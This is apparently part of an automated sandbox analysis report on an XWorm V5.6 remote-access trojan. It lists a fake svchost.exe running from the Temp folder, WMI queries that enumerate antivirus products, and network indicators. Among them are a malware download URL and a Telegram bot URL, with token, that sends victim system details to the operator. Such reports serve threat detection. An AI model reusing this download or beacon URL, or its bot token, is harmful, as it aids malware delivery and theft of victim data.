Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C: VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C: VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Queries volume information: C:\Windows\StartMenuExperienceHost.exe VolumeInformation	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\svchost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\svchost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\svchost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\svchost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\svchost.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\svchost.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\svchost.exe VolumeInformation

Source: svchost.exe, 00000009.00000002.3720185441.0000025157F02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 00000009.00000002.3720185441.0000025157F02000.00000004.00000020.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000000C.00000002.3724054665.000000001BD28000.00000004.00000020.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000000C.00000002.3724054665.000000001BD0A000.00000004.00000020.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000000C.00000002.3724844812.000000001CADE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\StartMenuExperienceHost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
172.66.0.158	r2.hypixel.cfd	United States	13335	CLOUDFLARENETUS	true
104.198.168.179	unknown	United States	15169	GOOGLEUS	false

Name	Malicious	Antivirus Detection	Reputation
104.198.168.179	true	Avira URL Cloud: safe	unknown
https://r2.hypixel.cfd/svchost.exe	true	Avira URL Cloud: malware	unknown
https://api.telegram.org/botAAFa5s6Qc5oDxqbipfR5RrOfgeTLKQlipKI/sendMessage?chat_id=7856673158&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A66ED47A5B18832423BF5%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%209TXRTVEZ%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6	false		high
127.0.0.1	false		high
http://ip-api.com/line/?fields=hosting	false		high